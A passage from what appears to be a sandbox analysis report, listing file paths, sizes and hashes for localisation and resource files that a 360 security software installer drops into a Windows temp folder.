                                                                                                                                                                                                                                                                                                                                      912102c07fcabe6d8a018de20b2ad97ea5f775dcb383cd3376168b7ebf8f9238

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      519ab81d0c3391f88050e5d7a2e839913c45c68f26dabad34c06c461ddb84c781bf7224e4d093462c475700e706eef562d1210cee3dba00a985d8dadbf165c5c

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\es\ipc\filemon.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      bfed06980072d6f12d4d1e848be0eb49

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      bb5dd7aa1b6e4242b307ea7fabac7bc666a84e3d

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      b065e3e3440e1c83d6a4704acddf33e69b111aad51f6d4194d6abc160eccfdc2

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      62908dd2335303da5ab41054d3278fe613ed9031f955215f892f0c2bb520ce1d26543fa53c75ce5da4e4ecf07fd47d4795fafbdb6673fac767b37a4fa7412d08

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\es\ipc\regmon.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      30KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9f2a98bad74e4f53442910e45871fc60

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      7bce8113bbe68f93ea477a166c6b0118dd572d11

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      1c743d2e319cd63426f05a3c51dfea4c4f5b923c96f9ecce7fcf8d4d46a8c687

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      a8267905058170ed42ba20fe9e0a6274b83dcda0dd8afa77cbff8801ed89b1f108cfe00a929f2e7bbae0fc079321a16304d69c16ec9552c80325db9d6d332d10

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\es\libdefa.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      319KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      aeb5fab98799915b7e8a7ff244545ac9

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      49df429015a7086b3fb6bb4a16c72531b13db45f

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      19fa3cbec353223c9e376b7e06f050cc27b3c12d255fdcb5c36342fa3febbec4

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      2d98ed2e9c26a61eb2f1a7beb8bd005eb4d3d0dac297c93faaf61928a05fb1c6343bb7a6b2c073c6520c81befdb51c87383eab8e7ca49bb060b344f2cf08f4d9

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\es\safemon\drvmon.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      5KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      c2a0ebc24b6df35aed305f680e48021f

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      7542a9d0d47908636d893788f1e592e23bb23f47

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      5ee31b5ada283f63ac19f79b3c3efc9f9e351182fcabf47ffccdd96060bfa2cf

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ea83e770ad03b8f9925654770c5fd7baf2592d6d0dd5b22970f38b0a690dfd7cb135988548547e62cca5f09cb737224bbb8f2c15fe3b9b02b996c319f6e271ed

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\fr\deepscan\art.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      38KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      0297d7f82403de0bb5cef53c35a1eba1

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      e94e31dcd5c4b1ff78df86dbef7cd4e992b5d8a8

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      81adb709eec2dfb3e7b261e3e279adf33de00e4d9729f217662142f591657374

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ce8983e3af798f336e34343168a14dc04e4be933542254ce14ff755d5eb2bcb6e745eda488bc24be2b323119006cf0bdb392c7b48558ca30f7f2e170a061a75e

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\fr\deepscan\dsr.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      58KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      504461531300efd4f029c41a83f8df1d

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      2466e76730121d154c913f76941b7f42ee73c7ae

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4649eedc3bafd98c562d4d1710f44de19e8e93e3638bc1566e1da63d90cb04ad

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      f7dd16173120dbfe2dabeab0c171d7d5868fd3107f13c2967183582fd23fd96c7eeca8107463a4084ad9f8560cd6447c35dc18b331fd3f748521518ac8e46632

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\hi\deepscan\dsconz.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      18KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      a426e61b47a4cd3fd8283819afd2cc7e

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      1e192ba3e63d24c03cee30fc63af19965b5fb5e2

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      bbabbf0df0d9b09cf348c83f8926fef859474e5c728936e75c88cd0ac15d9060

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      8cc7ff3d5a0841174f5852ba37dbc31a2041cdcba400a30a51d3af9caf4595af3ffe4db7f6fe9502008eb8c2c186fe8fa3afd633aac38c3d6b0ad9bc9bc11eec

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\hi\safemon\spsafe.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      9KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      2a7a7f903179394302cf47e52fcb997a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      ec5972a8f6ac68c1765a038538f5e3700b584835

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      d17477faa46ba23cd8cc4ed28f175d4327a1ceabb666756b50b6a912545d48a9

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      541d523c48462aff4e0c2abaaec1c565473268d8b9a1b708015c679376246fbbab8b2869e51594a2e2550cb12d201cd19a0786c93d25490760b69417cde1ef76

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\it\safemon\UDiskScanEngine.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      17KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      ef81ee8d0d3576979d8601dea4701034

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      f8e279b8b6801f800066233b462a265dc3e97df6

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      d3972848f049357fca4f33cb1864191fc47f461adc3ed314574307cbaeba3f27

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      1a82bcb564a31677637cc92b1a4bc129ceeed16c4034c19ac4083347aca91b6160a1876d3809c35b2b6a9da88bad4a406bb0933aebb67bb76a6725dd4485892b

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\it\safemon\bp.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      1b5647c53eadf0a73580d8a74d2c0cb7

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      92fb45ae87f0c0965125bf124a5564e3c54e7adb

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      d81e7765dacef70a07c2d77e3ab1c953abd4c8b0c74f53df04c3ee4adf192106

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      439738f2cdd0024e4d4f0da9668714fd369fb939424e865a29fc78725459b98c3f8ac746c65e7d338073374ab695c58d52b86aea72865496cd4b20fcd1aa9295

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\ja\ipc\NetDefender.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      23KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      428a0555a34e3ab7741863a983c207fb

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      78406acc6f42880661139f4489c53cc9be6ee1a9

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4c53a0ec712b0c87f818b222b90dc5722d863c11d50099897c7f4df971725c3f

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      7d44dbf0331649785a098e2c3f2683b93e77d28de4980dec6db59d0490599c4197b82cb9e24f3aa08e1d15256f260281aa291d1cd12f07d662321b35a252a47c

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\deepscan\DsRes64.dll
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      66KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      b101afdb6a10a8408347207a95ea827a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      bf9cdb457e2c3e6604c35bd93c6d819ac8034d55

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      41fc1d658e3d6795b701495d45e8d7bef7d8ce770138044b34fbacad08a617be

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      ce24418045352557b5d0ed9ec71db00d016938cd0fc2308e3ba0a61cd40ec0df3a9b620e55d28724b509bab3f801b7a88548b0b08b7d868a6046f85a49aae910

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\ipc\NetDefender.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      24KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      cd37f1dbeef509b8b716794a8381b4f3

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      3c343b99ec5af396f3127d1c9d55fd5cfa099dcf

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      4d1a978e09c6dafdcf8d1d315191a9fb8c0d2695e75c7b8650817d027008d1c1

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      178b73ed00bfd8241cc9191dbdd631ae28b5c7e76661863b326efde2dc2cb438716c0b70896ee313436ccd90f61db5226a3484169176f5a4b79ead1fb4451419

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\ipc\Sxin.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      48KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3e88c42c6e9fa317102c1f875f73d549

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      156820d9f3bf6b24c7d24330eb6ef73fe33c7f72

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      7e885136a20c3ab48cdead810381dccb10761336a62908ce78fe7f7d397cde0e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      58341734fb0cf666dfe9032a52674a645306a93430ebb2c6e5ad987e66ce19c8a91f3feebf9bba54b981d62127613dec3c939ef4168054d124b855a511b6d59c

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\ipc\Sxin64.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      46KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      dc4a1c5b62580028a908f63d712c4a99

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      5856c971ad3febe92df52db7aadaad1438994671

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      ee05002e64e561777ea43ac5b9857141dabb7c9eed007a0d57c30924f61af91e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      45da43ac5b0321ddc5ec599818287bd87b7b6822c8dd6d790b5bbf1232000092afa695774cd3d9c787919ad02ca9846f7200970e273a99bfbe2aa6bebfe7e8ed

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\ipc\appd.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      25KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9cbd0875e7e9b8a752e5f38dad77e708

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      815fdfa852515baf8132f68eafcaf58de3caecfc

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      86506ad8b30fc115f19ea241299f000bce38626fe1332601c042ee6109031e89

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      973801758415f10462445e9b284a3c5991ced2279674a6658d4b96c5f2d74aea31ce324ac0a3f20406df3594fbe8939483dce11b8d302e65db97f7bb513d1624

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\ipc\filemgr.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      21KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3917cbd4df68d929355884cf0b8eb486

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      917a41b18fcab9fadda6666868907a543ebd545d

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      463916c13812228c4fb990a765cbb5d0ee8bb7a1e27de9bdcea1a63cc5095a6a

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      072939985caa724ee5d078c32d41e60543027e23cce67b6f51c95e65ac16abaf2a1d6dce1692395c206c404f077219d30e9551c6d7592be3a0738c44e0627417

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\ipc\yhregd.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      18KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      8a6421b4e9773fb986daf675055ffa5a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      33e5c4c943df418b71ce1659e568f30b63450eec

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      02e934cbf941d874ba0343587a1e674f21fd2edef8b4a0cc0354c068ec6fe58b

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      1bb85909a5f00c4d2bf42c0cb7e325982c200babb815df888c913083aebd2c61020225beedda1e7861f7786a9f99179199ec6412d63dd1a3f1b8c8c9634e77ff

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\360SPTool.exe.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      31KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9259b466481a1ad9feed18f6564a210b

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      ceaaa84daeab6b488aad65112e0c07b58ab21c4c

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      15164d3600abd6b8f36ac9f686e965cfb2868025a01cded4f7707b1ae5008964

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      b7b06367ba9aa0c52ac5cfc49d66e220232d5482b085287c43de2ef8131f5ee703ffeb4d7bef0e5d9a430c0146bb2ab69c36174982184a0c06e6beda14e808b5

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\360procmon.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      106KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7bdac7623fb140e69d7a572859a06457

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      e094b2fe3418d43179a475e948a4712b63dec75b

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      51475f2fa4cf26dfc0b6b27a42b324a109f95f33156618172544db97cbf4dddd

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      fbed994a360ecff425728b1a465c14ffe056c9b227c2eb33f221e0614984fd21670eddb3681c20e31234a57bfe26bcf02c6a3b5e335d18610d09b4ed14aa5fb2

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\Safemon64.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      52KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      a891bba335ebd828ff40942007fef970

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      39350b39b74e3884f5d1a64f1c747936ad053d57

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      129a7ba4915d44a475ed953d62627726b9aa4048ffcc316c47f7f533b68af58b

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      91d1b04d550eda698b92d64f222ec59c29b5842115b3c3f1159313b620975bc8475b27151c23f21a78f60abd6c7fa9ce5cb1ea45f9349942338f9bf0c8cfc99f

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\SelfProtectAPI2.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      21KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      9d8db959ff46a655a3cd9ccada611926

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      99324fdc3e26e58e4f89c1c517bf3c3d3ec308e9

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      a71e57cafb118f29740cd80527b094813798e880de682eca33bfe97aaa20b509

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      9a2f2d88968470b49d9d13569263050b463570c3cce1b9821909e910a8a358e64ad428b86095a18f596d2b3ed77e0e21d40f9c24543e4a0872e6b35c5103bede

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\safemon.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      53KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      770107232cb5200df2cf58cf278aa424

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      2340135eef24d2d1c88f8ac2d9a2c2f5519fcb86

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      110914328d4bf85058efa99db13bfec2c73e3b175b91dfd6b41c6fa72ebaa103

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      0f8b98ded900d9421eb90cffd527d8218b14354d90b172d592c4945c482191d5e512f2678217c6214addb38da0b9bb9287f84963a50447cf232962bd99b0c3e8

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\spsafe.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      9KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      22a6711f3196ae889c93bd3ba9ad25a9

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      90c701d24f9426f551fd3e93988c4a55a1af92c4

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      61c130d1436efba0a4975bc3f1c5f9fdf094a097d8182119193b44150344940e

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      33db4f9474df53ce434f6e22f6883da100473d1b819984171356eeef523ba534c4abaf2536596b8758358e755e5d9f3793d85be12d2d8d5284fc7d13f6c005cd

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\spsafe64.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      9KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      5823e8466b97939f4e883a1c6bc7153a

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      eb39e7c0134d4e58a3c5b437f493c70eae5ec284

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      9327e539134100aa8f61947da7415750f131c4e03bbb7edb61b0fab53ea34075

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e4ea824314151115592b3b2ad8cd423dc2a7183292aa165f74f8e35da4f142d84d296d34506f503d448c7bd423be6bf04da2412b7daf474fbf4ef6a2af142bfc

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pl\safemon\webprotection_firefox\plugins\nptswp.dll.locale
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      5efd82b0e517230c5fcbbb4f02936ed0

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      9f3ea7c0778fedf87a6ed5345e6f45fb1bd173fb

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      09d58a2f0656a777a66288ac4068aa94a2d58d0534328862b8371709eab2003b

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      12775c718f24daa20ec8e4f3bdede4199c478900b12addcb068ae7b20806850fdc903e01c82e6b54e94363725dcff343aeac39c3512f5ea58d1ba8d46712ad33

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\pt\ipc\appmon.dat
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      28KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      3aacd65ed261c428f6f81835aa8565a9

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      a4c87c73d62146307fe0b98491d89aa329b7b22e

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      f635978ce8fc3a30589f20fd9129737585cc29e59d5170ec0d50f1be6aca14c4

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      74cf2ac111c5c159e4f039f31a2aab676c7d212948fa36ee99209d927db22fab625341de3435d7fbd19306a35b24a2a55a30adf9cefd81e0699529ba18c806e9

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\i18n\vi\safemon\CameraProtect\CameraGuard\bkg\pic_01.jpg
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      108KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      7fd8a81321483e2fd1dc4b67bb91a9b8

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      b88f74e739e3bc3b08959ac976329fa7bd62f10a

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      c3abe2119ec86bd98efbd6572c63c78426c0d7b34b925d355c70a7be9136a8a0

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      a50da95260de2c2460b1d123b2ec57ad9c71120d30e64719abd540fed2993213accfa040b2dea2d247c8f8cfb48970317c84524689a076e9a677af8212ca0f67

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\360_install_20240524224641_240769812\temp_files\safemon\gamemode.tpi
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      183KB

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      66e06c2237be285a51d8b2cae8dd1004

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      32c6a6a9516dbd9b88c9e80df4d7ddc45aaf9aac

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      47747a04102afdf4a955319b62c6c6a5b76f387df3e711dc3c7a0fb03d6bc796

                                                                                                                                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                                                                                                                                      e198be9ec8af47891233857f38d1063727381b9b03be5c9ad33bcb9eee62e7947d2818a53e9e2fd530b693070da64b1161771fdb165a1da99200382e7471567e

                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jk4oazcx.0ff.ps1
                                                                                                                                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                                                                                                                                      60B

                                                                                                                                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                                                      SHA512

